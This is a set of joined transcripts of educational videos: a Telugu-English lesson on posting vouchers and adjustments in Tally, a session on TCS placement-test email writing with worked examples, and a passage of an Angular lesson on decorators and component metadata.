పర్టికులర్స్ లో ఉండాలి. సో ఇంక్రీజ్ అప్, డిక్రీజ్ డౌన్, అట్లా గుర్తుపెట్టుకోండి, ఇంక్రీజ్ అప్, డిక్రీజ్ డౌన్. ఓకే, సపోజ్ ఒక బ్యాంక్ నుండి ఇంకో బ్యాంక్ కి నేను ట్రాన్స్ఫర్ చేశాం. సపోజ్ ఎస్బీఐ నుండి నేను యాక్సిస్ బ్యాంక్ కి ట్రాన్స్ఫర్ చేశాను, అవునా, ఎస్బీఐ నుండి యాక్సిస్ బ్యాంక్ కి ట్రాన్స్ఫర్ చేశాను. సో అప్పుడు ఏంటి, యాక్సిస్ బ్యాంక్ పైన ఉండాలి. ఓకే, యాక్సిస్ బ్యాంక్ పైన ఉండాలి. ఓకే, సపోజ్ ఆల్ట్ సి కొట్టి అకౌంట్ క్రియేట్ చేస్తున్నాను, యాక్సిస్ బ్యాంక్ అండర్ బ్యాంక్ అకౌంట్. ఓకే, సో ఐఎమ్ ట్రాన్స్ఫరింగ్ ఫ్రమ్ ఎస్బీఐ టు యాక్సిస్ బ్యాంక్, అంటే యాక్సిస్ బ్యాంక్ లో బ్యాలెన్స్ పెరిగింది, పైన యాక్సిస్ బ్యాంక్ తీసుకున్నాను, కింద ఎస్బీఐ బ్యాంక్ తీసుకున్నాను. సో యాక్సిస్ స్పెల్లింగ్ ఈజ్ రాంగ్, దెన్ హౌ టు డూ దిస్? So to make any alterations, just press Control Enter. Axis, AXIS. Okay, Axis Bank. Okay, Alt C korte kotta account create avutundi, Control Enter korte alter avutundi. So 10,000 transfer chesanu. So 10,000 you can have a look. 1 lakh you can see that. Okay, so whichever balance is increasing, that should be up, whichever balance is, which account balance is decreasing, that account should be down. ఏ బ్యాలెన్స్ అయితే ఇంక్రీజ్, ఏ అకౌంట్ లో బ్యాలెన్స్ అయితే ఇంక్రీజ్ అవుతుందో అది పైన ఉండాలి, ఏ అకౌంట్ లో అయితే బ్యాలెన్స్ తగ్గుతుందో అది కింద ఉండాలి. దిస్ ఈజ్ అప్లైడ్ ఓన్లీ ఫర్ కాంట్రా, నాట్ ఫర్ అదర్ వోచర్స్. ఓకే, సో దిస్ ట్రాన్సాక్షన్ is not there, but just I'm posting this. Okay, next one, paid salaries. So which account? Payment. What is the shortcut key? FI. What you are paying? Cash. How you are paying? Cash. What you are paying? Salaries. What is the amount? 10,000. Okay, being salaries paid. Okay, so students we have seen all the transactions, right?
సో టాలీలో ఉన్న ట్రాన్సాక్షన్ ఏవైతే ఉన్నాయో అన్నీ చూసి we post the adjustments also, right? సో మనకున్న అయితే 15 ట్రాన్సాక్షన్స్ వరకు ఉన్నాయి. ఆ 15 ట్రాన్సాక్షన్స్ అన్ని మనము టైంలో పోసాం. అంటే ప్రతి ఒక్క ట్రాన్సాక్షన్ చదివి అది అమౌంట్ వస్తే రిసీట్లో, అమౌంట్ పోతే పేమెంట్లో, ఒకవేళ బ్యాంక్లో డిపాజిట్ చేస్తే, కాంట్రాలో బ్యాంక్లో నుండి విత్డ్రా చేస్తే కాంట్రాలో, అది పర్చేజ్ అయితే పర్చేజ్లో, ఓకే, సేల్స్ అయితే సోల్డ్ అయితే సేల్స్లో. సో ఈ విధంగా మనకు ఆ 6 వర్చెస్ అని డిసైడ్ చేస్తాం. సో ఐ నో దట్ యూ హ్యావ్ నాట్ డన్ విత్ ద డెబిట్ నోట్స్ ఆర్ క్రెడిట్ నోట్స్, దట్ ఆల్సో వీఆర్ గోయింగ్ టు డూ ఇన్ ద other classes. I hope, and I have made for that also one more problem we are going to solve. There's some other next classes. So this is the way how to post this transaction. So ప్రతి ఒక్క ట్రాన్సాక్షన్ మనం అబ్జర్వ్ చేసినట్టయితే అమౌంట్ వస్తే డెబిట్, అమౌంట్ పోతే క్రెడిట్, సేల్ ఉంటే సేల్స్, పర్చేస్ ఉంటే వెరీ సింపుల్. ఓకే, మనకి అమౌంట్ క్యాష్ వస్తే రిసిప్ట్లో రాయండి, క్యాష్ పోతే పేమెంట్లో రాయండి, చెక్ వస్తే రిసిప్ట్లో రాయండి, చెక్ బయట వాళ్ళకి ఇస్తే పేమెంట్లో రాయడం. సో దిస్ ఇస్ వే హౌ టు రైట్ ద రిసిప్ట్ అండ్ రిసిప్ట్ వచ్చేసి అండ్ పేమెంట్ వచ్చేది. క్యాష్ గూడ్స్ అమ్మితే సేల్స్లో, గూడ్స్ పర్చేస్ చేస్తే పర్చేస్లో, ఓకే, క్యాష్ డిపాజిట్ చేస్తే కాంట్రాలో, క్యాష్ విత్డ్రా చేస్తే కాంట్రాలో, ఇవన్నీ ఏవి కాకుంటే జర్నల్లో. ఓకే, సో ప్రతి ఒక్క ట్రాన్సాక్షన్స్ ని మనం సింగిల్ ఎంట్రీ మోడ్ లో చేయొచ్చు, డబుల్ ఎంట్రీ మోడ్ లో చేయొచ్చు. సో స్టూడెంట్ మైండ్ లో అందరూ సింగిల్ ఎంట్రీ అంటే వాళ్ళకున్న సింగిల్ ఎంట్రీ అంటే సార్ ఏదో ఒక డెబిట్ అవుతుంది, ఏదో ఒక క్రెడిట్ అవుతుంది కదా, దానికి సింగిల్ ఎంట్రీ అంటారు కదా. సో హౌ యువర్ బ్యాలెన్సెస్ విల్ బి గెట్ మ్యాచ్డ్ అని అనుకుంటాం. సో ఇక్కడ టాలీలో సింగిల్ ఎంట్రీ మోడ్ అంటే ఆప్షన్ ఏంటంటే, అంటే ఏదో క్యాష్ ఆర్ బ్యాంక్ ఏదో అకౌంట్ మాత్రం, ఒక అకౌంట్ మాత్రమే అవుతుంది, మీది అని క్రెడిట్ అవుతుంది. సో దట్ ఈస్ కాల్డ్ సింగిల్ ఎంట్రీ. సో మీకు ఒక ఎగ్జాంపుల్ చేసి చూపించాను. సింగిల్ ఎంట్రీ అంటే లైక్ పేమెంట్, రిసిప్ట్ అండ్ కాంట్రా. అంటే ఎదర్ యూ ఆర్ రిసీవింగ్ ఓన్లీ క్యాష్ ఆర్ ఓన్లీ బ్యాంక్, then you can go for single entry. If you are receiving cash and bank check for only one thing, then you have to go for double entry system. అంటే మీకు మల్టిపుల్ డెబిట్స్, మల్టిపుల్ క్రెడిట్స్ కావాలి అనుకున్నప్పుడు డబుల్ ఎంట్రీ మోడ్ లో వెళ్తారు. ఓకే, డబుల్ ఎంట్రీ మోడ్ కి మూడ్కి అప్లై అవుతుంది. ఇట్ ఇస్ రిసీట్స్, పేమెంట్స్, కాంట్రా. అంటే రిసీట్ లో కానీ, ఇప్పుడు రిసీట్ లో మీకు క్యాష్ ఉంది, చెక్ ఉంది, అలాగే ఇంకా వేరే ఒక అంటే ఒక 2 డెబిట్స్ ఉన్నాయి, 3 క్రెడిట్స్ ఉన్నాయి, దెన్ గో ఫర్ డబుల్ ఎంట్రీ. అలాగే పేమెంట్ లో కూడా క్యాష్ కూడా పేమెంట్ చేశారు, చెక్ కూడా పేమెంట్ చేశారు, డిఫరెంట్ అకౌంట్స్ కి పేమెంట్ చేశారు, దెన్ యూ క్యాన్ గో ఫర్ మల్టిపుల్ ఎంట్రీస్. ఓకే, మల్టిపుల్ డెబిట్స్, మల్టిపుల్ క్రెడిట్స్ ఉన్నప్పుడు సింపుల్ గా చెప్పాలి అంటే మల్టిపుల్ డెబిట్స్, మల్టిపుల్ క్రెడిట్స్ ఉన్నప్పుడు డబుల్ ఎంట్రీ వాడతాము, లేదంటే సింగిల్ ఎంట్రీ వాడతాం. సో బెటర్ యూ గో ఫర్ సింగిల్ ఎంట్రీ బికాస్ క్యాష్ చెక్ ఒకరికి ఇవ్వం. ఓకే, ఉన్నా కానీ సపరేట్ రిసిప్ట్ వచ్చేసి మెయింటైన్ చేస్తాం. ఓకే, నౌ సీ ద స్క్రీన్, వీఆర్ గోయింగ్ టు సీ ద అడ్జస్ట్మెంట్స్ ఆల్సో. సో అడ్జస్ట్మెంట్స్, సో స్టాక్ తయారు చెప్తాను అన్నాను ఎందుకంటే కొంచెం దానికి కొంచెం యాక్టివేషన్స్ అన్ని ఉంటాయి. సో బిఫోర్ దట్ విల్ సీ electricity charges payable. So electricity charges payable in adjustment entry, right? So I said you that all adjustment entries should be done in F7 journal. So then go for F7 journal. So debit was entry into electricity charges. Amount enta 500. Credit is what? Electricity charges payable. Okay, then you can write bin charges payable. Okay, you can write and see. So next, salaries payable. Debit salaries. Amount is 15,000. Credit salaries payable. Amount is 15,000. Next one, shop rent payable. Shop rent debit. Shop rent debit. What is the amount? 12,500. Credit shop rent payable. Okay. Next one is depreciation furniture. So depreciation debit. So 10% అన్నాడు, 10% అన్నాడు. సో 1 lakh 10% 10,000. సో యూ కెన్ క్యాల్కులేట్ కంట్రోల్ అండ్ 1 lakh లో into 10% అవుతుంది 10,000. Okay, 10,000. Credit
furniture. Simple. Okay, now come to the closing stock. Then how to, so closing stock with two ways to entry change. So first I will tell you how to do in a simple method. So closing stock undi kada. So first మీరు ఏం చేస్తారు అంటే ఇన్వెంటరీ ఇన్ఫోలోకి వెళ్ళి స్టాక్ ఐటమ్స్కి వెళ్ళి క్రియేట్ అనండి. ఇక్కడ ఏం చేస్తారంటే స్టాక్ అని టైప్ చేయండి, అంత ఏమి ఇవ్వదు ఇక్కడ. డోంట్ సెలెక్ట్ ఎనీ యూనిట్స్ ఆఫ్ మేజర్స్ అండ్ ఆల్, జస్ట్ క్రియేట్ యాజ్ స్టాక్. అంటే క్లోజింగ్ స్టాక్ ఒక స్టాక్ అనేది ఎంట్రీ చేయండి. వన్స్ అగైన్ ఐఎమ్ రిపీటింగ్ హౌ టు ఎంటర్ ద క్లోజింగ్ స్టాక్. గో టు ఇన్వెంటరీ ఇన్ఫో, గో ఫర్ స్టాక్ ఐటమ్స్ అండ్ గో ఫర్ క్రియేట్. జస్ట్ టైప్ యాజ్ స్టాక్. ఓకే, స్టాక్ అని జస్ట్ అట్లా క్రియేట్ చేయండి, అంతే, ఏం చెయ్యొద్దు. జస్ట్ స్టాక్ అని క్రియేట్ చేసి వదలండి. అండ్ హౌ టు ఎంటర్ దిస్ అమౌంట్ 50,000 ఎలా ఎంట్రీ చేస్తాము? జస్ట్ గో ఫర్ inventory vouchers, okay, and right side you select as stock and give the amount. What is that? 50,000. Okay, so be careful that stock ఎప్పుడు ఇస్తున్నారు, ఈ డేట్ ఇస్తున్నారు ఫస్ట్ ఏప్రిల్కి. సో మీరు ఫస్ట్ ఏప్రిల్ వరకు చూసుకోవాలి. సో 31st మార్చ్కి ఇవ్వాలి, అట్లా ఏమైనా డేట్స్ ఉంటే ఇక్కడ 31st మార్చ్ ఇవ్వండి. ఓకే, సింపుల్. Okay, so once again I am explaining. Go to inventory info, go for stock items, go for create stock 1. Okay, అనేది తర్వాత మీరు ఇన్వెంటరీ వోచర్స్ లోకి వెళ్ళేసి రైట్ సైడ్ ప్రొడక్షన్ లో స్టాక్ 1 అని వేసుకొని అమౌంట్ వేయండి, సరిపోతుంది. అండ్ సేవ్ ఇట్. ఓకే, దిస్ ఈస్ హౌ టు ఎంటర్ ద స్టాక్ ఎంట్రీ. నౌ ద రిపోర్ట్స్ వీ హ్యావ్ టు సీ నౌ. ఓకే, రిపోర్ట్స్. ఓకే, మనం ఫస్ట్ స్టెప్, సెకండ్ స్టెప్, థర్డ్ స్టెప్ లేదు, ఫోర్త్ స్టెప్ చేసేసాము, ఫిఫ్త్ స్టెప్ రిపోర్ట్. సో రిపోర్ట్స్ లో ఫస్ట్ మీకు ఏం కావాలి? ప్రాఫిట్ అండ్ లాస్ అకౌంట్. దెన్ గో ఫర్ ప్రాఫిట్ అండ్ లాస్ అకౌంట్, ప్రెస్ ఇన్ డీటెయిల్, దెన్ యూ గెట్ ద స్టాక్. ఓకే, ఓకే, సో దిస్ ఈస్ హౌ టు గెట్ యువర్ థింగ్. సో గ్రాస్ ప్రాఫిట్ వచ్చింది కదా, గ్రాస్ ప్రాఫిట్ 2,14,500. సో గ్రాస్ ప్రాఫిట్ యూ గాట్ 2,14,500. ఓకే, అలాగే చూస్తే నెట్ ప్రాఫిట్. ఓకే, వాట్ ఈస్ నెట్ ప్రాఫిట్? 1,51,800. బట్ ఇక్కడ మీకు 42,800 ఉంది. సో హౌ దిస్ డిఫరెన్స్ వీఆర్ గోయింగ్ టు చెక్. నెక్స్ట్ వన్ బ్యాలెన్స్ షీట్ 8 lakhs. సో కమ్ ఎస్కేప్, గో ఫర్ బ్యాలెన్స్ షీట్. ఓకే, గో ఫర్ బ్యాలెన్స్ షీట్. యూ కెన్ చెక్ 8,54,800, 8,45,500. If you press Ctrl and see the difference, 8,45,800, 8,45,800 minus 8,54,800. So there is a difference of 9,000. ఆ 9,000 expense extra చేసామో చూద్దాం. Okay, next one, stock summary. Sorry. సో గ్రాస్ ప్రాఫిట్ నెట్వర్క్ బ్యాంక్ క్యాష్ బ్యాలెన్స్ కరెక్ట్ మ్యాచ్ అవుతుందో చూద్దాం. సో క్లోజింగ్ ఆఫ్ 50,000 వచ్చింది, క్యాష్ 3,29,800, 3,20,800, అంటే మనం 9,000 ఏదో పోస్టింగ్ ఎక్స్ట్రా చేసాము. నెక్స్ట్ క్యాష్ ఎస్బీఐ బ్యాలెన్స్ 3,85,000, 3,00,000 కరెక్ట్గా మ్యాచ్ అయింది, అంటే క్యాష్ లో మేము ఎక్స్ట్రా ట్రాన్సాక్షన్ చేసాము, ఆ 9,000 ఏదో చూస్తాం. ఓకే, హోప్ ట్రాన్స్పోర్ట్ అండ్ సేల్స్ ఈస్ రైట్. So students, if you observe that there is a difference of 9,000, why that is 9,000? Because just go for it. Ante cash difference undi, endukunde enter kodam, just you press enter, that's all. Okay, press enter, it will go to that. So transportation sales is 1,000. I have entered as 10,000, but transportation sales is 1,000, right? So go for that and change it. So automatically changes avutundi. So if you want to make any changes, you can go. Okay. Now if you observe, see, profit and loss account 1,51,800, profit and loss account 1,51,800, balance sheet 8,54,800, 8,54,800. Okay, cash balance is 3,29,800, bank account is 3,85,000. Okay, so students, we have seen, right? So a problem
మీకు ప్రాబ్లం బద్దలు పాస్ కూడా చేశాను. సో మీరు స్క్రీన్ షాట్ తీసుకొని ప్లీజ్ యూ ప్రాక్టీస్ దట్. So in these transactions, so in the given transactions we have seen almost 6 vouchers, that receipts, payment, sales, purchase, contract, journal. So most probably మనకి 6 మాత్రమే ఎక్కువ బిజినెస్ లైఫ్ లో యూస్ అవుతాయి. అందుకే ఫస్ట్ బేసిక్ గా మీకు 6 vouchers వచ్చి ఒక ప్రాబ్లం డిజైన్ చేసి మీకు ఇచ్చాను. ఓకే, దాని కింద ఆన్సర్స్ కూడా ఉన్నాయి, అదే మీరు ప్రాక్టీస్ చేస్తూ ఉండండి. In the other class, in the coming next classes, we are going to see with inventory, we are going to see with debit notes, credit note, that is sales returns and purchase return. Okay, till then have a nice day. Welcome everyone for today's session. It's another week where we are going to talk about the TCS assessment pattern. So as TCS is going to conduct a drive across AP, you will be notified about the places, the dates and all these important elements of information. Today I'm going to talk about the email writing for one last time. You will be notified about the next topic tomorrow. Before I begin, just to give you a brief, TCS is going to conduct a drive. This is for the new recruitment process that's going to begin. You will have 2 stages of selection. The first one is an online assessment. The second segment is the second stage is the interview round. Now, when we talk about the online assessment, you will have 4 categories, and when we talk about interviews, you will have HR round and technical round. You need to clear the online assessment in order to qualify for the interview round, to be called for the interview. So you need to finish and you need to write accurately the entire online assessment, and there are 4 categories, and all the 4 categories you need to clear. Even if you disqualify in one of the rounds or one of the sections, you will be disqualified. So the online test has 4 different sections. The first one is email writing. Then you have quantitative aptitude, then you have multiple choice question on C programming language, and then you have coding test. You will have 1 email to be written with a time limit of 10 minutes. You will have 20 questions for quantitative aptitude with a time limit of 40 minutes. Multiple choice question on programming language C, you will have 10 questions to be finished in 20 minutes. And the coding test, which is a descriptive one, you need to write a program code which can be executed without an error. Only 1 such question with a time permitted as 20 minutes. If you look at the quantitative aptitude, it says number of star mark questions is 2. Just focus here. 2 questions which is star marked. What it basically means is the entire assessment will have negative marking, and this is applicable only for quantitative aptitude. There will be a negative mark of 0.33% for every wrong response. However, the 2 questions which is marked as star, you will lose double the points in case if it's incorrect, but you will also score double the marks if you answer it correct, which means the star mark questions have 2 times more marks. So if your answer is correct, you will score double. If your answer is incorrect, you will lose double. So which means it will become 0.66, negative 0.66. The topics that will be covered for quantitative aptitude is probability, permutation and combination, time and distance, time and work, equations, ratios and proportions, allocations or mixtures, series and progression, average, percentage, profit and loss, problems on ages, areas, shapes and perimeter, number system, HCF and LCM, reasoning. As far as the email is concerned, I will show you a sample. I had been talking about sample every single day, but sadly not a single person has responded on the comment section of YouTube. So the email do's which you need to keep in mind: read the topic carefully and read and understand the keywords or key phrases mentioned. Use
each and every keyword phrases mentioned in the topic. Even if you miss one of the keywords, the email will be invalid. Ensure the keywords are used in the same form as mentioned. You cannot change the tense or the verb form. Keywords should be mentioned in the sequence as mentioned in the topic. Every new paragraph should start when there is a change in thought group. So you will have introduction, you will have the body, and then you will have the summary. So each of these thought groups, there will be a new paragraph, and new paragraph will start with a fresh line. Another set of do's which you need to keep in mind: your entire email should be left indent. Please do not leave a gap when you start a new paragraph on the left. Usually we have the tendency of leaving a gap. Please don't do that. Use the receiver's name and sender's name as mentioned in the topic. You should not change either of the names if it's already mentioned in the topic. The email should start with a greeting, hello, salutation, and also close with thanks and regards, or thanks or regards. And you should mention the sender's name in the next line. The entire email should be written within 10 minutes, and you should click on the submit button before the 10-minute time is up. Even if you click on the button at the 10th minute, you will not be able to submit it. So please don't take a risk. Please finish writing the email within 6 to 7 minutes. Spend a couple of more minutes to revise and make changes and corrections. And please click on the submit button even before the clock shows 10 minutes is up. Every email will be given with a set of instruction. The instruction will also carry the number of words the email should have. Please make sure your email is exceeding those number of words. For example, if it says 50 words, your email should be 50 and above. Even if it's 49, you will get disqualified. Here are certain don'ts. Do not miss even a single keyword or phrase which is mentioned in the topic. Do not change the tense or the verb form of the email of the keywords which is mentioned. Do not address the receiver as hi. Hi is very casual. Either use hello or use respected or use dear wherever it's applicable. Do not make any spelling, grammar or punctuation mistakes because you will lose points. Please make sure you don't exceed the 10-minute mark, and please do not write the email below the prescribed number of words. Okay? So let me show one more example today. Here is number 4 and 5 is what I'm going to complete today. After that, we'll be done with email writing today. As a tourist who has taken a package tour, write an email to the travel agent, Mr. Kumar, which means Mr. Kumar is the recipient, highlighting that the hotel is far from what was promised. Sign the email as Ahmed. So Ahmed is the sender. So Ahmed has taken Ahmed has taken a package tour from Mr. Kumar, but during the entire travel, they figured that the service is not good. So that's why they're writing an email. The outline or the keyword should be package tour, promise, 3-star, unclean, shocked, professional, customer service, disappointed, shift, expectation, facilities, help. Here are the instructions. It is compulsory to use all the specific words mentioned in the outline in your email. You can add other sentences of your choice as appropriate. The name of the sender and receiver should be as given. The email must contain a minimum of 50 words or it will not be evaluated at all. If the outline is strictly not followed, including specific words used or correct English, which means correct grammar and spelling is not used, the grade in this section will be poor, which means you will lose marks. So here is your question in red font, and the green font are the keywords. Please make a note of this. I'm going to pause. Make a note of this, then I will tell you how to write this email. I'll quickly check. So you have the comment section here. In case if you're watching this on YouTube, you can click here and type your question.
So whatever questions you have with regards to email writing for TCS, please post your questions here. I will answer your questions. Okay, so let me copy this and I'm going to write the email now. Okay. Since I'm using a title, I will use a full stop and there should be a space. If I don't use a space, I will lose points in terms of punctuation. The name should start with capital letter. Okay, so here is the entire email. Mr. Kumar, now the question said the email should be written to Mr. Kumar. The sender is Ahmed. So here is the entire email. If you see, I have an introduction, then there is the body, and then there is summary. So basically I have written in 3 paragraphs, and every time I am changing paragraph I am coming to a new line. The entire email is left indent. If you leave a gap like this, this is incorrect. So please make sure you don't leave a gap. Now let's quickly check the word count.
The word count is 101, 101. The question said it should be 50. I have written 101, 101 words, which is absolutely perfect. Now we need to check if we have used all the keywords or not. The first one is package tour, promise, 3-star, unclean, shocked, unprofessional, customer service, disappointed. I have used disappointed here as well, so which is fine. Shift, expectation, facilities and help. Facilities, help. So I've used all the keywords which is mentioned in the topic. Now let's read it. Hello Mr. Kumar, this is with regards to the package tour I've taken from you. I'm very disappointed and want to inform you that the service is not as per what the promise was. As per the package, comma, then space. The accommodation is a 3-star hotel, but we were given a low quality hotel. The room was unclean and I was shocked to see absolutely unprofessional customer service. I am very disappointed with the whole package and I want to shift to another hotel as this is below my expectation. Please make sure the facilities are, see I made a mistake here, are as what the promise, please make sure the facilities are as what promised, what was promised, and please help in this regard. Regards, Ahmed. So you don't have to use a comma here after the name. You don't have to use a comma after regards, not needed. The name starts with capital letter. After full stop, the sentence starts with capital letter. Every new paragraph starts with a new line and first letter capital. After comma, there is a space. So punctuation wise, grammar wise, structure wise, spelling wise, no mistakes. So this is a perfect email. Okay. So you need to keep in mind that you write the entire email in left indent. You don't make a space like this. It's incorrect. Even the summary, the closure is also left indent. Okay. Now let's look at example number 5, which is our last one. I'm going to read, then I'm going to pause so that you can make a note of it. As a member of your residential society, write an email to your inspector of local police station, Mr. Sharma, informing him about the miscreants who ride their bikes rashly every evening outside your society. Sign the email as William. The keywords are residential, rashly, children, play, elderly, walk, grocery shop, across the road, dangerous, accidents, nuisance, action, immediately. Okay, one person has sent an email. Wow. Posted on the comment section. This message is from Lakshmi Ganesh Vemuri, who asks how to send email to government institutions about clarifying doubts about how to join those institutions. I will quickly tell you how to write this email. Lakshmi Ganesh Vemuri, don't worry, I'm going to reply to that. Before I respond to the particular question, here is your sample number 5. Please make a note of this. I'm going to quickly write this particular email and then I will help the person who asked the question.
These are the keywords. Now I need to write this email to the local police station, and the inspector's name is Mr. Sharma and the sender's name is William. Alright. Since I'm writing it to a government official, I can use the word respected. So this is my introduction. Okay, so here's my entire email. Let me quickly check if I've used more than 50 words. The word count is 105, which means I've used more than double. Now let's read it. Respected Inspector Sharma, I'm a resident of GB Towers in Vijayawada and I'm writing to you to bring to your notice about the problems we are facing. The society is a residential area for more than 100 families. There is a severe problem of young boys who ride their bikes very rashly every evening. There are children who go out to play and elderly people who are out for their evening walk. We also have residents going out to grocery shop across the road. The whole situation is very dangerous as accidents could happen. Please address this problem to stop the nuisance and take action immediately. Regards, William. Now, have I used all the keywords? Let's quickly check. First one is residential area, ride rashly, children
play, elderly, walk, grocery, shop, across the road. Now this is a phrase. Dangerous, accidents, nuisance, action, immediately. So I've used all the keywords. The entire email is left indent. Okay, so I made sure there are no punctuation mistakes, there are no grammar mistakes, and every information is correctly mentioned here. Okay, so that was the last sample, and the email is subjected to Inspector Sharma. That is what the question said, and it's signed off as William as per the topic. Okay, so I hope this was helpful. Now let's quickly go to these two questions. How to send email to government institution about clarifying doubt about how to join in those institutions. If I understand your question correctly, Mr. Lakshmi Ganesh, I think you are asking about a job. I hope you are asking about joining as an employee of these government organizations and not at an educational institution. Okay, so whenever you have a situation like this, always address the receiver as respected sir, madam. Now you don't know what gender the person is, so it's good to write sir and madam both with a slash. I would like to join your esteemed organization. Now, another person has asked a similar question, how to send a CV in an email. Now, whenever you're sending a CV or a resume on an email, it should have a cover letter. So this can act as a cover letter as well. Next paragraph. Please find attached my resume. It's not resume, it's resume. Before that, you can just mention a little bit of introduction. I'm a science graduate. With specialization in, you can mention something specifics. I'm a science graduate with specialization in microprocessor from Andhra University. I completed my engineering in 2017 and I am seeking employment in a reputed government department. Please find attached my resume, which has the details of my academic and personal information. Okay. I look forward to hear back from you. Thanking you in advance. Warm regards.
to change the spelling. Just mention your name. So you have first name, middle name and last name. So all these should start with capital letter. Okay. The person who asked about Vamshi, how we send CV in an email, it should have a cover letter. So this is like a cover letter as well. Okay. So let me zoom it a little bit. So here is your email. Alright, very simple, very short. You gave your introduction a little bit and you also said your resume is attached. Okay. Tarun is asking how send marketing works in email. I don't understand what that means. Tarun, please rephrase your question. Your question is not clear. I'm not understanding when you say how send marketing works in email. I'm not quite clear what it means. Okay. So please ask your question again. Please phrase it properly so that I can understand and respond to your question. First two folks who asked the question, Lakshmi Ganesh Vemuri and Vamshi, this is the answer. I hope this is helpful. If you still have any questions, feel free to post in the comment section. Even after the live session is over, I will take a look at it and I will provide you with the answer. So even after the live session is over, now we have live chat. After the session is over, the comment section in the bottom of the YouTube program will get enabled. So you can post your questions there. I'm very happy that 3 people who asked questions today. So the last person, Tarun, your question is not quite clear. So please ask your question again and I will provide you with the answer. Okay. So I hope this was somewhat helpful. Whatever questions you have, please post on the YouTube comment section. I'll take a look and I will provide you with the answer. Okay. So I hope to see you tomorrow, and tomorrow I'll give you more details about this entire TCS placement drive. Thank you so much for watching. You have a great day. Bye-bye. Welcome to Web Technologies training program. In that yesterday lesson we have seen how to create Angular login form. In the today's lesson mainly we are going to look forward for decorators and directives in Angular. So one of the important topics of Angular is decorators and directives. So these two will be present in almost every file. So almost in every situation we require these decorators and directives. So what exactly the decorators? First let us try to understand. So decorators are the predefined functions that can be written above the class or above the property or above the method that add some special meaning or special status for the particular class, property or method. Assume we have a class. So it is by default an ordinary class. So this ordinary class can be converted into some special type of class by using decorator. For example, we are saying that this particular class is a component class. This particular class is a module class. This particular argument receive the dependency injection. So how do we specify these special meanings or special status for the class, property or method? We can add the special meaning by using decorators. So there are some predefined decorators to create various types of items in the Angular applications. In Angular applications we have components, pipes, directives, services, etc. To create each item we have to use respective decorator. So let us try to understand the list of decorators in detail. So what is decorator? Decorator is a predefined function in TypeScript
which specifies some special meaning or special status for the class, property, argument or method. So the list of important decorators in Angular is @component. It's a function, so we have to add the brackets, ng module, pipe, injectable, inject. These are the important list of decorators. Let's try to understand each one. First one is @component. This decorator specifies that the class is a component class. Assume we have created an ordinary class. How do we say this particular class is a component class? This is not an ordinary class. I would like to say it's a component class. We can say it's a component class by using something called @component. We have to keep the @component just above the class. There is a class. Above the class we have to add @component to say that this class is a component class. The following class is a component class. That is the meaning of @component. If you don't add the @component, the class remains as a normal class. If you add @component, the class is a component class. That is the difference. So check the syntax. We have class name. In order to convert the class as a component class, we have to add something called @component brackets. We have to keep the decorator above the class, which means that which specifies that this class is a component class. So similarly, we have something called ng module. This decorator specifies that the class is a module class. To specify that it's a module, we have to use @ng module. We will discuss more about the modules later. The third one, @pipe. If you want to create your own pipe, we have to use @pipe. About the pipes also we will discuss later. To say that your class is a component, we have to keep @component. To say your class is a module, we have to add @ng module. To say that it's a pipe, we have to use @pipe. About modules and pipes we will discuss later. The next one, @injectable. In order to say your class is a service class, we have to add @injectable. There is no decorator called @service, but we have to use injectable for the service class. About the services also we will discuss in the further lessons. The last and final one, inject. This decorator specifies the dependency injection. When we will discuss about the services in future, I will explain about the @inject also. And this @inject is applicable only for the constructor parameter. Only we can take a constructor. There we have to give @inject, service class name, followed by parameter name, colon service class name as a data type, then constructor open, constructor close. This is the syntax for service class development. So we will discuss about the services, dependency injection, pipes and modules later in the further lessons. But as of now, we are clearly know that
what is a component. A component is a class that defines the programming logic of the certain area of your application. Earlier we have created a login form. So in order to represent the programming logic of the login form, we have created a login component which include essential properties, methods, constructors, etc. Whereas actual design logic should be in the HTML file, actual programming logic should be in the TS file. Next, so we have understood the component which is already present here. Also we have understood ng module, which means that we are creating a module. But what are all these things like a declarations, imports, providers, bootstrap here, and here selector, template URL, style URLs, animations, and host. These properties are called metadata. Metadata is a object literal that can be written inside the decorator. So let's understand what is metadata. Metadata is additional details about the particular decorator. For example, we are saying that so and so ABC is the name of the person. By profession, he is a doctor. For example, here doctor is an example of decorator. But I want to specify his specialization, his experience, etc. These are additional details about his profession. These details are called metadata. So to specify the class behavior, we have to use a decorator. To say more deeper details about that, we have to use metadata. Always this metadata will be written inside the decorator. First we have to use the decorator. Inside the decorator we have to add the metadata for more clarity, for more details. So, but the metadata will be differ for every decorator. It's not like same metadata for all the decorators. That means the metadata of the component is different. The metadata of modules is different. The metadata of inject is different. Every decorator has its own metadata. So metadata is written as object literal. The object literal contains a set of properties with respect to values. Already we have discussed about object literals in the JavaScript lessons. So this object is a metadata which is written inside the decorator. The object literal cannot be written outside the decorator, so it has no meaning outside. So most of the metadata properties contain the string data type. Most of the properties data type is string. So let's try to understand the metadata of the component first. So metadata of component, meaning is what? We are trying to provide some additional details about the component. So if this is the component, component is a decorator. This object what you can see inside the brackets is represented as metadata. It includes selector, template URL, style URLs, animations, and host. Let's understand one by one. The first one, selector. It specifies that the tag name with which you can access or invoke the component. Assume we have created a component and we are invoking the component with the help of a tag. The tag can be represented as a selector. I will show the practicality of this. For example, inside the home component, you would like to display the login component. So what we will do is that go to the home component template. Where exactly you want to display the login form component, we have to use something called app-login, which means that in this place the login form should be appear. So if you can compile and execute, inside the home we can see the login form.
But how it is possible? How this login form is displayed inside the home? The reason, first home component is invoked because the URL is a /home as per the routing already we have discussed. Inside that we have written something called app-login. So which means that this app-login will automatically invoke the login component. But how that app-login is connected to this particular login component? The reason, selector. Whatever we have given, that will be registered as a tag name. With the same tag name, somewhere, anywhere, we can call that particular component. Here we have registered app-login as a selector. With that particular tag name, we are going to invoke the same in the home component. We can invoke the same multiple times by using the same selector. Now we can expect 3 times the login is going to appear. Let me place in every div tag. We are able to invoke the same any number of times. So we are invoking a number of times. So in this way, okay, let me remove the animation. So we are invoking that same 3 times, right? So we are invoking 3 times. That means because 3 times we have written the selector. Each time it will go to the particular component, it will automatically create an object for the component class, then go to the template. The output result of the template is going to appear here. That happens 3 times. As we have invoked 3 times, we can use it any number of times. So overall, what I want to say exactly, the selector is the name of the tag with which you want to call it. In case if you want to change, we can change. For example, instead of app-login, I want to change it as my login. We have to use the same name for all the corresponding tags. Everywhere we have to use a my login now instead of app-login. So my login will invoke all the login components. That's all. We have understood what is the selector. Secondly, we have template URL. Template URL specifies the HTML file which contains the template of the component. By definition, every component is a class. It's just a program, collection of some programming statements which includes the properties and methods which define the programming logic of your application. Every component must be associated to any one template. So there is a component means definitely sure that the component is having a corresponding template, because without template the component is not a component at all. The 